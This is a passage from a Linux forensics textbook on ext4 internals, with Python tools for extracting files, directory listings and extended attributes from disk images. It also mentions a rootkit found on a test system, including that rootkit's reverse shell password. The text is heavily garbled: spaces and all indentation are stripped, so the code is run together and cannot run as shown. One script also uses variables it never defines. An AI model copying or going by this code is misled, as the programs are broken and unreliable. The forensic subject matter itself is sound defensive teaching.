#ext4uses256byteinodesonthedisk
#asofJuly2015thelogicalsizeis156bytes
#thefirstwordisthesizeoftheextrainfo
ifinodeSize>128:
self.inodeSize=128+getU16(data,0x80)
#thisistheupperwordofthechecksum
ifself.inodeSize>0x82:
self.checksum+=getU16(data,0x82)*pow(2,16)
#theseextrabitsgivenanosecondaccuracyoftimestamps
#thelower2bitsareusedtoextendthe32-bitseconds
#sincetheepochcounterto34bits
#ifyouarestillusingthisscriptin2038youshould
#adjustthisscriptaccordingly:-)
ifself.inodeSize>0x84:
self.changeTimeNanosecs=getU32(data,0x84)>>2
ifself.inodeSize>0x88:
self.modifyTimeNanosecs=getU32(data,0x88)>>2
ifself.inodeSize>0x8c:
self.accessTimeNanosecs=getU32(data,0x8c)>>2
ifself.inodeSize>0x90:
self.createTime=time.gmtime(getU32(data,0x90))
self.createTimeNanosecs=getU32(data,0x94)>>2
else:
self.createTime=time.gmtime(0)
defprettyPrint(self):
fork,vinsorted(self.__dict__.iteritems()):
ifk==‘extents’andself.extents:
v[0].prettyPrint()#printheader
foriinrange(1,v[0].entries+1):
v[i].prettyPrint()
elifk==‘changeTime’ork==‘modifyTime’or\
k==‘accessTime’\
ork==‘createTime’:
printk+”:”,time.asctime(v)
elifk==‘deleteTime’:
ifcalendar.timegm(v)==0:
print‘Deleted:no’
else:
printk+”:”,time.asctime(v)
else:
printk+”:”,v
Theresultsofrunningistat.pywiththeupdatedextfs.pyfileareshowninFigure7.22.Thehighlightedlinesshownwhathasbeenadded.
FIGURE7.22
Results of running istat.py against an inode associated with a rootkit on the PFE subject system. Thehighlightedlinesshowinformationabouttheextentusedtostorethisfile.
Nowthatwecanread theblock informationforboth traditionalblocksandextents,ascript to retrieve a file from its inode is easily created. The new script will be namedicat.py.TheSleuthKitprovidesasimilarutilitynamedicat.Wewillbeginbyaddingtwonewhelperfunctionstoextfs.py.Thenewcodefollows.#getadatablockfromanimage
defgetDataBlock(imageFilename,offset,blockNo,blockSize=4096):
withopen(str(imageFilename),‘rb’)asf:
f.seek(blockSize*blockNo+offset*512)
data=str(f.read(blockSize))
returndata
“””
functiongetBlockList
Thisfunctionwillreturnalistofdatablocks
ifextentsarebeingusedthisshouldbesimpleassuming
thereisasingleleveltothetree.
Forextentswithmultiplelevelsandforindirectblocks
additional“diskaccess”isrequired.
Usage:bl=getBlockList(inode,imageFilename,offset,blockSize)
whereinodeistheinodeobject,imageFilenameisthenameofa
rawimagefile,offsetistheoffsetin512bytesectorstothe
startofthefilesystem,andblockSize(default4096)isthe
sizeofadatablock.
“””
defgetBlockList(inode,imageFilename,offset,blockSize=4096):
#nowgetthedatablocksandoutputthem
datablocks=[]
ifinode.extents:
#greatweareusingextents
#extentzerohastheheader
#checkfordepthofzerowhichismostcommon
ifinode.extents[0].depth==0:
foriinrange(1,inode.extents[0].entries+1):
sb=inode.extents[i].startHi*pow(2,32)+\
inode.extents[i].startLo
eb=sb+inode.extents[i].len#reallyendsinthisminus1
forjinrange(sb,eb):
datablocks.append(j)
else:
#loadthislevelofthetree
currentLevel=inode.extents
leafNode=[]
whilecurrentLevel[0].depth!=0:
#readthecurrentlevel
nextLevel=[]
foriinrange(1,currentLevel[0].entries+1):
blockNo=currentLevel[i].leafLo+\
currentLevel[i].leafHi*pow(2,32)
currnode=getExtentTree(getDataBlock(imageFilename,\
offset,blockNo,blockSize))
nextLevel.append(currnode)
ifcurrnode[0].depth==0:
#ifthereareleavesaddthemtotheend
leafNode.append(currnode[1:])
currentLevel=nextLevel
#nowsortthelistbylogicalblocknumber
leafNode.sort(key=lambdax:x.block)
forleafinleafNode:
sb=leaf.startHi*pow(2,32)+leaf.startLo
eb=sb+leaf.len
forjinrange(sb,eb):
datablocks.append(j)
else:
#wehavetheoldschoolblocks
blocks=inode.fileSize/blockSize
#getthedirectblocks
foriinrange(0,12):
datablocks.append(inode.block[i])
ifi>=blocks:
break
#nowdoindirectblocks
ifblocks>12:
iddata=getDataBlock(imageFilename,offset,\
inode.block[12],blockSize)
foriinrange(0,blockSize/4):
idblock=getU32(iddata,i*4)
ifidblock==0:
break
else:
datablocks.append(idblock)
#nowdoubleindirectblocks
ifblocks>(12+blockSize/4):
diddata=getDataBlock(imageFilename,offset,\
inode.block[13],blockSize)
foriinrange(0,blockSize/4):
didblock=getU32(diddata,i*4)
ifdidblock==0:
break
else:
iddata=getDataBlock(imageFilename,offset,\
didblock,blockSize)
forjinrange(0,blockSize/4):
idblock=getU32(iddata,j*4)
ifidblock==0:
break
else:
datablocks.append(idblock)
#nowtripleindirectblocks
ifblocks>(12+blockSize/4+blockSize*blockSize/16):
tiddata=getDataBlock(imageFilename,offset,\
inode.block[14],blockSize)
foriinrange(0,blockSize/4):
tidblock=getU32(tiddata,i*4)
iftidblock==0:
break
else:
diddata=getDataBlock(imageFilename,offset,\
tidblock,blockSize)
forjinrange(0,blockSize/4):
didblock=getU32(diddata,j*4)
ifdidblock==0:
break
else:
iddata=getDataBlock(imageFilename,offset,\
didblock,blockSize)
forkinrange(0,blockSize/4):
idblock=getU32(iddata,k*4)
ifidblock==0:
break
else:
datablocks.append(idblock)
returndatablocks
The first helper function, getDataBlock, simply seeks to the correct place in the fileimage and then reads a blockof data.The second function, getBlockList, is a bitmoreinvolved.Itbeginswithachecktoseeifextentsareinuse.Ifextentsarebeingused,mostfileshavenothingbutleafnodesinthefourentriesfromtheinodeblockarray.Wedoaquickchecktoseeifthetreedepthiszeroand,ifthisisthecase,simplyreadtheentriesfromtheinodeblockarray.Wedothisnotjusttosimplifythecodeforthemostcommoncase,butalsobecausenofurtherdiskaccessisrequiredtogenerateablocklist.
Ifwehaveamulti-leveltree,wesavethecurrentlevelofinodesandcreateanemptylistof leaf nodes. We then begin a while loop on the line while
currentLevel[0].depth!=0:.Thisloopwillexecuteuntilthelowestlevel(leafnodes)ofthetreehasbeenfound.AnyleafnodesencounteredwhilewalkingthroughthetreeareappendedtotheleafNodelist.
AfterexitingthewhilelooptheleafNodelistissortedbylogicalblocknumberonthelineleafNode.sort(key=lambdax:x.block).Pythonhastheabilitytosortalist inplace.Inorder tosort thelistwerequireasortingfunctionthat ispassedintothesortmethodastheparameternamedkey.Thisiswherethelambdacomesin.InPythonalambda is an anonymous function. The construct key=lambda x: x.block isessentiallythesameassayingkey=f(x)wheref(x)isdefinedasfollows:
deff(x):
returnx.block
Youcaneasilyseewhyyouwouldn’twant todefineanamedfunction like thiseverytimeyouwantedtoperformasortorotheroperationrequiringasingleusefunction.ThelambdakeywordmakesyourPythoncodemuchmorecompactandeasiertounderstandonceyouknowhowitworks.
The code to handle old school blocks is straightforward, but somewhat cumbersome,thankstothenestedloopstohandletheindirectblocks.Firstwecalculatethenumberofblocks required. Then we read in the direct blocks. If the file has any singly indirectblocksweusegetDataBlocktoreadtheblockandtheniterateoverthelistofupto1024blocks.We keep going until we hit the end of the list or an address of zero (which isinvalid).Iftheaddressiszero,thebreakcommandisexecuted.Thiscommandwillexitthecurrentloop.Ifthecurrentloopisnestedinsideanotherloop,onlytheinnermostloopis exited. The doubly and triply indirect block handling code is similar, butwith extralevelsofnestedloops.
The icat.py script follows. It is similar to the istat.py filewith the biggest differencebeingacalltogetBlockListfollowedbyaloopthatprints(writes)everyblocktostandardout.#!/usr/bin/python
#
#icat.py
#
#ThisisasimplePythonscriptthatwill
#printoutfileforinaninodefromanext2/3/4filesysteminside
#ofanimagefile.
#
#DevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
importextfs
importsys
importos.path
importsubprocess
importstruct
importtime
frommathimportlog
defusage():
print(“usage“+sys.argv[0]+\
“<imagefile><offset><inodenumber>\n”\
“Displaysfileforaninodefromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<3:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopennedforreading”)
exit(1)
emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])
#getinodelocation
inodeLoc=extfs.getInodeLoc(sys.argv[3],\
emd.superblock.inodesPerGroup)
offset=emd.bgdList[inodeLoc[0]].inodeTable*
emd.superblock.blockSize+\
inodeLoc[1]*emd.superblock.inodeSize
withopen(str(sys.argv[1]),‘rb’)asf:
f.seek(offset+int(sys.argv[2])*512)
data=str(f.read(emd.superblock.inodeSize))
inode=extfs.Inode(data,emd.superblock.inodeSize)
datablock=extfs.getBlockList(inode,sys.argv[1],sys.argv[2],\
emd.superblock.blockSize)
fordbindatablock:
sys.stdout.write(extfs.getDataBlock(sys.argv[1],long(sys.argv[2]),\
db,emd.superblock.blockSize))
if__name__==“__main__”:
main()
Partialresultsfromrunningicat.pyagainstaninodeassociatedwitharootkitareshownin Figure 7.23. The output from the script has been piped toxxd in order to properlydisplay the hex values inside this program. The screenshot shows several embeddedstringswhichcontainerrormessagesandeventhereverseshellpasswordof“sw0rdm4n”.
FIGURE7.23
Partialresultsfromicat.pyagainstaninodeassociatedwitharootkitonthePFEsubjectsystem.Theoutputhasbeenpipedtoxxd.Notethatseveralerrormessagesandtheremote loginpasswordarevisible in thisscreenshot.
DirectoryentriesWe have learned that inodes contain all the metadata for a file. They also contain thelocationofthefile’sdatablocks.Theonlythingthatremainstobeknownaboutafileisits name.This connection between an inode and a filename ismade in directories.Notsurprisingly,directoriesarestoredinfilesinLinux,theoperatingsystemwhereeverythingisafile.Inourdiscussionofinodesearlierinthischapterwedidsaythatinode2wasusedtostoretherootdirectory.
The classic directory entry consists of a 4-byte inode number, followed by a 2-byterecord length, thena2-bytenamelength,andfinally thenamewhichmaybeup to255characterslong.ThisisshowninTable7.15.Noticethatthenamelengthistwobytes,yetthemaximumnamelengthcanbestoredinonlyonebyte.Thismayhavebeendoneforbytealignmentpurposesoriginally.
Table7.15.Theclassicdirectoryentrystructure.
Offset Size Name Description
0x0 4 Inode Inode
0x4 2 Reclen Recordlength
0x6 2 Namelen Namelength
0x8 Name Namestring(upto255characters)
Realizing that the upper byte was unused, an (incompatible) filesystem feature, FileType,wascreatedtore-purposethisbytetoholdfiletypeinformation.Itshouldbefairlyobviouswhythisisontheincompatiblefeaturelist,asinterpretingthisaspartofthenamelengthwouldmakeitseemlikeallthefilenameshadbecomegarbled.Thisoptimizationspeedsupanyoperationsthatonlymakesenseforacertaintypeoffilebyeliminatingtheneedtoreadlotsofinodesmerelytodeterminefiletype.ThedirectoryentrystructureforsystemswiththeFileTypefeatureisshowninTable7.16.
Table7.16.DirectoryentrystructurewhenFileTypefeatureisenabled.
Offset Size Name Description
0x0 4 Inode Inode
0x4 2 Reclen
Recordlength
0x6 1 Namelen
Namelength
0x7 1 Filetype
0x00Unknown0x01Regular0x02Directory0x03Chardevice0x04Blockdevice0x05FIFO0x06Socket0x07Symlink
0x8 Name Namestring(upto255characters)
Theoriginaldirectorieshadnochecksumsorothertoolsforintegritychecking.Inorderto add this functionality without breaking existing systems, a special type of directoryentryknownas adirectory tailwasdeveloped.Thedirectory tail has an inodevalueofzerowhichisinvalid.Oldersystemsseethisandassumethattheendofthedirectory(tail)hasbeenreached.Therecord length issetcorrectly to12.Thedirectory tailstructure isshowninTable7.17.
Table7.17.Directorytailstructure.
Offset Size Name Description
0x0 4 Inode Settozero(inodezeroisinvalidsoitisignored)
0x4 2 Reclen Recordlength(setto12)
0x6 1 Namelen Namelength(settozerosoitisignored)
0x7 1 Filetype Setto0xDE
0x8 4 Checksum DirectoryleafblockCRC32checksum
Thelineardirectoriespresentedthusfarinthissectionarefineaslongasthedirectoriesdonotgrowtoolarge.Whendirectoriesbecomelarge,implementinghashdirectoriescanimproveperformance.Justasisdonewiththechecksum,hashentriesarestoredaftertheendofthedirectoryblockinordertofoololdsystemsintoignoringthem.Recallthatthereisanext4_indexflagintheinodethatwillalertcompatiblesystemstothepresenceofthehashentries.
The directory nodes are stored in a hashed balanced treewhich is often shortened tohtree.Wehaveseentreesinourdiscussionofextentsearlierinthischapter.ThosefamiliarwithNTFSknow thatdirectoriesonNTFS filesystemsare stored in trees. In theNTFScase,nodesarenamedbasedontheirfilename.Withhtreesonextendedfilesystemsnodesarenamedbytheirhashvalues.Becausethehashvalueisonlyfourbyteslong,collisionswilloccur.Forthisreason,oncearecordhasbeenlocatedbasedonthehashvalueastringcomparison of filenames is performed, and if the strings do notmatch, the next record(whichshouldhavethesamehash)ischeckeduntilamatchisfound.
Theroothashdirectoryblockstartswiththetraditional“.”and“..”directoryentriesforthisdirectoryandtheparentdirectory,respectively.Afterthesetwoentries(bothofwhichare twelvebytes long), there isa16-byteheader, followedby8-byteentries throughtheendoftheblock.TheroothashdirectoryblockstructureisshowninTable7.18.
Table7.18.Roothashdirectoryblockstructure.
Offset Size Name Description
0x0 12 Dotrec “.”directoryentry(12bytes)
0xC 12 DotDotrec “..”directoryentry(12bytes)
0x18 4 Inodeno Inodenumbersetto0tomakefollowingbeignored
0x1C 1 Hashversion
0x00Legacy0x03Legacyunsigned0x01HalfMD40x04UnsignedhalfMD40x02Tea0x05UnsignedTea
0x1D 1 Infolength Hashinfolength(0x8)
0x1E 1 Indirlevels Depthoftree
0x1F 1 Unusedflag
Flags(unused)
0x20 2 Limit Maxnumberofentriesthatfollowthisheader
0x22 2 Count Actualnumberofentriesafterheader
0x24 4 Block Blockw/idirectoryforhash=0
0x28 Entries Remainderofblockis8-byteentries
If thereareany interiornodes, theyhave thestructureshowninTable7.19.Note thatthreeof the fieldsare in italics.The reason for this is that Ihave foundsomecode thatreferstothesefieldsandotherplacesthatseemtoimplythatthesefieldsarenotpresent.
Table7.19.Interiornodehashdirectoryblockstructure.Entriesinitalicsmaynotbepresentinallsystems.
Offset Size Name Description
0x0 4 Fakeinode Settozerosothisisignored
0x4 2 Fakereclen Settoblocksize(4k)
0x6 4 Namelength Settozero
0x7 1 Filetype Settozero
0x8 2 Limit Maxentriesthatfollow
0xA 4 Count Actualentriesthatfollow
0xE 4 Block Blockw/idirectoryforlowesthashvalueofblock
0x12 Entries Directoryentries
The hash directory entries (leaf nodes) consist of two 4-byte values for the hash andblockwithinthedirectoryofthenextnode.Thehashdirectoryentriesareterminatedwithaspecialentrywithahashofzeroand thechecksumin thesecond4-bytevalue.TheseentriesareshowninTable7.20andTable7.21.
Table7.20.Hashdirectoryentrystructure.
Offset Size Name Description
0x0 4 Hash Hashvalue
0x4 4 Block Blockw/idirectoryofnextnode
Table7.21.Hashdirectoryentrytailwithchecksum.
Offset Size Name Description
0x0 4 Reserved Settozero
0x4 4 Checksum Blockchecksum
Wecannowaddsomecodetoourextfs.pyfileinordertointerpretdirectories.Tokeepthingssimple,wewon’tutilizethehashdirectoriesiftheyexist.Forourpurposesthereislikely to be little if any speed penalty for doing so. The additions to our extfs.py filefollow.
defprintFileType(ftype):
ifftype==0x0orftype>7:
return“Unknown”
elifftype==0x1:
return“Regular”
elifftype==0x2:
return“Directory”
elifftype==0x3:
return“Characterdevice”
elifftype==0x4:
return“Blockdevice”
elifftype==0x5:
return“FIFO”
elifftype==0x6:
return“Socket”
elifftype==0x7:
return“Symboliclink”
classDirectoryEntry():
def__init__(self,data):
self.inode=getU32(data)
self.recordLen=getU16(data,0x4)
self.nameLen=getU8(data,0x6)
self.fileType=getU8(data,0x7)
self.filename=data[0x8:0x8+self.nameLen]
defprettyPrint(self):
print(“Inode:%sFiletype:%sFilename:%s”%(str(self.inode),\
printFileType(self.fileType),self.filename))
#parsesdirectoryentriesinadatablockthatispassedin
defgetDirectory(data):
done=False
retVal=[]
i=0
whilenotdone:
de=DirectoryEntry(data[i:])
ifde.inode==0:
done=True
else:
retVal.append(de)
i+=de.recordLen
ifi>=len(data):
break
returnretVal
Therearenonewtechniquesinthecodeabove.Wecanalsocreateanewscript,ils.py,whichwillcreateadirectorylistingbasedonaninoderatherthanadirectoryname.Thecodeforthisnewscriptfollows.Youmightnoticethatthisscriptisverysimilartoicat.pywiththeprimarydifferencebeingthatthedataisinterpretedasadirectoryinsteadofbeingwrittentostandardout.#!/usr/bin/python
#
#ils.py
#
#ThisisasimplePythonscriptthatwill
#printoutfileforinaninodefromanext2/3/4filesysteminside
#ofanimagefile.
#
#DevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
importextfs
importsys
importos.path
importsubprocess
importstruct
importtime
frommathimportlog
defusage():
print(“usage“+sys.argv[0]+“<imagefile><offset><inodenumber>\n”\
“Displaysdirectoryforaninodefromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<3:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopennedforreading”)
exit(1)
emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])
#getinodelocation
inodeLoc=extfs.getInodeLoc(sys.argv[3],\
emd.superblock.inodesPerGroup)
offset=emd.bgdList[inodeLoc[0]].inodeTable\
*emd.superblock.blockSize+\
inodeLoc[1]*emd.superblock.inodeSize
withopen(str(sys.argv[1]),‘rb’)asf:
f.seek(offset+int(sys.argv[2])*512)
data=str(f.read(emd.superblock.inodeSize))
inode=extfs.Inode(data,emd.superblock.inodeSize)
datablock=extfs.getBlockList(inode,sys.argv[1],sys.argv[2],\
emd.superblock.blockSize)
data=“”
fordbindatablock:
data+=extfs.getDataBlock(sys.argv[1],long(sys.argv[2]),db,\
emd.superblock.blockSize)
dir=extfs.getDirectory(data)
forfnameindir:
fname.prettyPrint()
if__name__==“__main__”:
main()
Theresultsfromrunningthenewscriptagainsttherootdirectory(inode2)andthe/tmpdirectory from the PFE subject system are shown in Figure 7.24 and Figure 7.25,respectively.Notice that the“lost+found”directory is in inode11which is theexpectedplace.InFigure7.25twofilesassociatedwitharootkitarehighlighted.
FIGURE7.24
Runningils.pyagainsttherootdirectoryofthePFEsubjectsystem.
FIGURE7.25
Runningils.pyagainstthe/tmpdirectoryofthePFEsubjectsystem.
ExtendedattributesThe extended filesystem family supports extended attributes. The first use of extendedattributeswas forAccessControl Lists (ACL).While it is certainly not uncommon forextendedattributestohouseACLstoday,theycanbeusedtostorealmostanythingasauserattributeiftheattributenamebeginswith“user.”.Somethingtokeepinmindisthatolder kernels required the correct set of mounting options to be used when ACLs areimplemented. This is another reason to capture themount information during your liveanalysis.
If the extended attribute is small, it can be stored in the extra space between inodes.Currentlythereare100bytesofextraspace.Largerextendedattributescanbestoredinadatablockpointed toby file_acl in the inode.Anattackermightuse auser attribute tohide information on a hacked system. This is similar to using Alternate Data Streams(ADS)toattachhiddeninformationtoafileonaNTFSfilesystem.Thereisoneimportantdifference between user attributes and ADS, however. There are standard tools fordisplayingextendedattributesonLinux,andyouneednotknowtheexactattributenametousethem,asisthecasewithADS.
Whetherstoredininodesordatablocks,allextendedattributelistsbeginwithaheader.Theheaderdoesvaryinthesetwocases,however.Theheaderinsidetheinodeconsistsofa4-bytemagicnumberonly.TheextendedattributesheaderstructureforattributesstoredintheinodeanddatablockareshowninTable7.22andTable7.23,respectively.
Table7.22.Extendedattributeheaderforattributesinaninode.
Offset Size Name Description
0x0 4 Magicno 0xEA020000
Table7.23.Extendedattributeheaderforattributesinadatablock.
Offset Size Name Description
0x0 4 Magicno 0xEA020000
0x4 4 Refcount Referencecount
0x8 4 Blocks Blocksusedtostoreextendedattributes
0xC 4 Hash Hash
0x10 4 Checksum Checksum
0x14 12 Reserved Shouldbezeroed
Theextendedattributeentryorentriesfollow(s)theheader.TheextendedattributeentrystructureisshowninTable7.24.Notetheuseofanameindexinordertoreducestorage.
Table7.24.Extendedattributeentrystructure.
Offset Size Name Description
0x0 1 Namelen
Lengthofattributename
0x1 1 Nameindex
0x0=noprefix0x1=user.prefix0x2=system.posix_acl_access0x3=system.posix_acl_default0x4=trusted.0x6=security.0x7=system.0x8=system.richacl
0x2 2 Valueoffs
Offsetfromfirstinodeentryorstartofblock
0x4 4 Valueblock
Diskblockwherevaluestoredorzeroforthisblock
0x8 4 Valuesize
Lengthofvalue
0xC 4 Hash Hashforattribsinblockorzeroifininode
0x10 Name Attributenamew/otrailingNULL
ThestandardLinuxcommandsfordisplayingextendedattributeandACLinformationare getfattr and getfacl, respectively. Not surprisingly, the commands to alterextendedattributesandACLsaresetfattrandsetfacl, respectively.See themanpagesfordetailsonthesecommands.BasicusageofthesecommandsisdemonstratedinFigure7.26.
FIGURE7.26
Usingthecommandstosetandgetextendedattributes.
The following code will add extended attribute support to our extfs Pythonmodule.Therearenopreviouslyundiscussedtechniquesinthiscode.“””
printExtAttrPrefix.Convertsa1-byteprefix
codeforanextendedattributenametoastring.
Usage:prefixString=printExtAttrPrefix(index)
“””
defprintExtAttrPrefix(index):
ifindex==0orindex>8:
return“”
elifindex==1:
return“user.”
elifindex==2:
return“system.posix_acl_access”
elifindex==3:
return“system.posix_acl_default”
elifindex==4:
return“trusted.”
elifindex==6:
return“security.”
elifindex==7:
return“system.”
elifindex==8:
return“system.richacl”
“””
ClassExtAttrEntry.Storestheraw
extendedattributestructurewiththe
prefixprependedtotheattributename.
Usage:ea=ExtAttrEntry(data,offset=0)
wheredataisapackedstringrepresentingthe
extendedattributeandoffsetisthestartingpoint
inthisblockofdataforthisentry.
“””
classExtAttrEntry():
def__init__(self,data,offset=0):
self.nameLen=getU8(data,offset+0x0)
self.nameIndex=getU8(data,offset+0x1)
self.valueOffset=getU16(data,offset+0x2)
self.valueBlock=getU32(data,offset+0x4)
self.valueSize=getU32(data,offset+0x8)
self.valueHash=getU32(data,offset+0xc)
self.name=printExtAttrPrefix(self.nameIndex)+\
str(data[offset+0x10:offset+0x10+self.nameLen])
“””
Usage:
getExtAttrsFromBlock(imageFilename,offset,blockNo,blocksize)
whereimageFilenameisarawext2/ext3/ext4image,offsetis
theoffsetin512bytesectorstothestartofthefilesystem,
blockNoisthedatablockholdingtheextendedattributes,and
blocksizeisthefilesystemblocksize(default=4k).
“””
defgetExtAttrsFromBlock(imageFilename,offset,\
blockNo,blockSize=4096):
data=getDataBlock(imageFilename,offset,\
blockNo,blockSize)
returngetExtAttrsHelper(False,imageFilename,\
offset,data,blockSize)
“””
Usage:
getExtAttrsInInode(imageFilename,offset,data,blocksize)
whereimageFilenameisarawext2/ext3/ext4image,offsetis
theoffsetin512bytesectorstothestartofthefilesystem,
dataisthepackedstringholdingtheextendedattributes,and
blocksizeisthefilesystemblocksize(default=4k).
“””
defgetExtAttrsInInode(imageFilename,offset,data,blockSize=4096):
returngetExtAttrsHelper(True,imageFilename,offset,data,blockSize)
#Thisisahelperfunctionfortheproceedingtwofunctions
defgetExtAttrsHelper(inInode,imageFilename,offset,data,blockSize=4096):
#firstfourbytesaremagicnumber
retVal={}
ifgetU32(data,0)!=0xEA020000:
returnretVal
done=False
ifinInode:
i=4
else:
i=32
whilenotdone:
eae=ExtAttrEntry(data,i)
#isthisanextendedattributeornot
ifeae.nameLen==0andeae.nameIndex==0andeae.valueOffset==0\
andeae.valueBlock==0:
done=True
else:
#intheinodeorexternalblock?
ifeae.valueBlock==0:
v=data[eae.valueOffset:eae.valueOffset+eae.valueSize]
else:
v=getDataBlock(imageFilename,offset,eae.valueBlock,\
blockSize)[eae.valueOffset:eae.valueOffset+eae.valueSize]
retVal[eae.name]=v
i+=eae.nameLen+12
ifi>=len(data):
done=True
returnretVal
The following script can be used to print out extended attributes for an inode in animage. I include thismostly for completeness. If youmount the filesystem image, it iseasytolistouttheseattributesusingstandardsystemtoolsdiscussedinthissection.#!/usr/bin/python
#
#igetattr.py
#
#ThisisasimplePythonscriptthatwill
#printoutextendedattributesinaninodefromanext2/3/4
#filesysteminsideofanimagefile.
#
#DevelopedforPentesterAcademy
#byDr.PhilPolstra(@ppolstra)
importextfs
importsys
importos.path
importsubprocess
importstruct
importtime
frommathimportlog
defusage():
print(“usage“+sys.argv[0]+“<imagefile><offset><inodenumber>\n”\
“Displaysextendedattributesinanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<3:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopennedforreading”)
exit(1)
emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])
#getinodelocation
inodeLoc=extfs.getInodeLoc(sys.argv[3],\
emd.superblock.inodesPerGroup)
offset=emd.bgdList[inodeLoc[0]].inodeTable*\
emd.superblock.blockSize+inodeLoc[1]*emd.superblock.inodeSize
withopen(str(sys.argv[1]),‘rb’)asf:
f.seek(offset+int(sys.argv[2])*512)
data=str(f.read(emd.superblock.inodeSize))
inode=extfs.Inode(data,emd.superblock.inodeSize)
ifinode.hasExtendedAttributes:
#isitintheinodeslackoradatablock
ifinode.extendAttribs==0:
attrs=extfs.getExtAttrsInInode(imageFilename,offset,\
data[inode.inodeSize:],emd.superblock.blockSize)
else:
attrs=extfs.getExtAttrsFromBlock(imageFilename,offset,\
blockNo,emd.superblock.blockSize)
fork,vinattrs.iteritems():
print“%s:%s”%(k,v)
else:
print‘Inode%shasnoextendedattributes’%(sys.argv[3])
if__name__==“__main__”:
main()
JOURNALINGAspreviouslymentioned, the journal isused to increase the likelihoodof thefilesystembeing inaconsistentstate.Aswithmost thingsLinux, the journalingbehavior ishighlyconfigurable.Thedefaultistoonlywritemetadata(notdatablocks)throughthejournal.This is done for performance reasons.The default can be changed via themount dataoption.Theoptiondata=journalcausesalldatablocks tobewritten throughthe journal.Thereareotheroptionsaswell.Seethemountmanpagefordetails.
Thejournalcausesdatatobewrittentwice.Thefirsttimedataiswrittentothediskasquicklyaspossible.Toaccomplishthis,thejournalisstoredinoneblockgroupandoftenistheonlythingstoredinthegroup.Thisminimizesdiskseektimes.Later,afterthedatahasbeencommittedtothejournal,theoperatingsystemwillwritethedatatothecorrectlocationonthediskandthenerasethecommitmentrecord.Thisnotonlyimprovesdataintegritybut it also improvesperformancebycachingmanysmallwritesbeforewritingeverythingtodisk.
Thejournalisnormallystoredininode8,butitmayoptionallybestoredonanexternaldevice.Thelatterdoesnotseemtobeverycommon.Regardlessofwhereitisstored,thejournal contains a special superblock that describes itself.When examining the journaldirectlyitisimportanttorealizethatthejournalstoresinformationinbigendianformat.ThejournalsuperblockissummarizedinTable7.25.
Table7.25.Thejournalsuperblock.
Offset Type Name Description
0x0 be32 h_magic Jbd2magicnumber,0xC03B3998
0x4 be32 h_blocktype Shouldbe4,journalsuperblockv2
0x8 be32 h_sequence TransactionIDforthisblock
0xC be32 s_blocksize Journaldeviceblocksize.
0x10 be32 s_maxlen Totalnumberofblocksinthisjournal.
0x14 be32 s_first Firstblockofloginformation.
0x18 be32 s_sequence FirstcommitIDexpectedinlog.
0x1C be32 s_start Blocknumberofthestartoflog.
0x20 be32 s_errno Errorvalue,assetbyjbd2_journal_abort().
0x24 be32 s_feature_compat Compatiblefeatures.0x1=Journalmaintainschecksums
0x28 be32 s_feature_incompat Incompatiblefeatureset.
0x2C be32 s_feature_ro_compat Read-onlycompatiblefeatureset.Therearen’tanyofthesecurrently.
0x30 u8 s_uuid[16] 128-bituuidforjournal.Thisiscomparedagainstthecopyintheext4superblockatmounttime.
0x40 be32 s_nr_users Numberoffilesystemssharingthisjournal.
0x44 be32 s_dynsuper Locationofdynamicsuperblockcopy.
0x48 be32 s_max_transaction Limitofjournalblockspertransaction.
0x4C be32 s_max_trans_data Limitofdatablockspertransaction.
0x50 u8 s_checksum_type Checksumalgorithmusedforthejournal.Probably1=crc32or4=crc32c.
0x51 0xAB Padding 0xABbytesofpadding
0xFC be32 s_checksum Checksumoftheentiresuperblock,withthisfieldsettozero.
0x100 u8 s_users[16*48] IDsofallfilesystemssharingthelog.
Thegeneralformatforatransactioninthejournalisadescriptorblock,followedbyoneormoredataorrevocationblocks,andacommitblockthatcompletesthetransaction.Thedescriptorblock startswith aheader (which is the sameas the first twelvebytesof thejournal superblock) and then has an array of journal block tags that describe thetransaction.Datablocksarenormallyidenticaltoblockstobewrittentodisk.Revocationblocks contain a list of blocks thatwere journaled in the past but should no longer bejournaledinthefuture.Themostcommonreasonforarevocationisifametadatablockischanged to a regular file data block. The commit block indicates the end of a journaltransaction.
I will not provide the internal structures for the journal blocks here for a couple ofreasons.First,thejournalblockstructurescandiffersignificantlybasedontheversionofjournalingandselectedoptions.Thejournalisaninternalstructurethatwasneverreallymeant tobe readbyhumans.Microsofthas releasednothingpubliclyabout theirNTFSjournalinginternals.TheonlyreasonwecanknowabouttheLinuxjournalinginternalsisthatitisopensource.
Second,therearefilesystemutilitiesinLinux,suchasfsck,thatcanproperlyreadthejournalandmakeanyrequiredchanges.Itislikelyabetterideatousethebuilt-inutilitiesthan to try and fix a filesystem by hand. If you do want to delve into the journalinginternals, there is no better source than the header andC files themselves. Thewiki atkernel.orgmayalsobehelpful.
SUMMARYTosaythatwelearneda littleaboutextendedfilesystemsin thischapterwouldbequitethe understatement. We have covered every feature likely to be found on an ext4filesystem as of this writing in considerable depth. We also learned a couple of newPythonandshellscriptingtechniquesalongtheway.Inthenextchapterwewilldiscusstherelativelynewfieldofmemoryforensics.
CHAPTER
8MemoryAnalysisINFORMATIONINTHISCHAPTER:
CreatingaVolatilityprofileGettingprocessinformationProcessmapsanddumpsGettingbashhistoriesUsingVolatilitycheckpluginsGettingnetworkinformationGettingfilesysteminformationfrommemory
VOLATILITYTheVolatility framework is anopen source toolwritten inPythonwhich allowsyou toanalyzememoryimages.WebrieflymentionedVolatilitywayback inChapter3on liveresponse. The first version of Volatility that supported Linux was released in October2012.HopefullyLinuxsupportinVolatilitywillcontinuetoevolve.
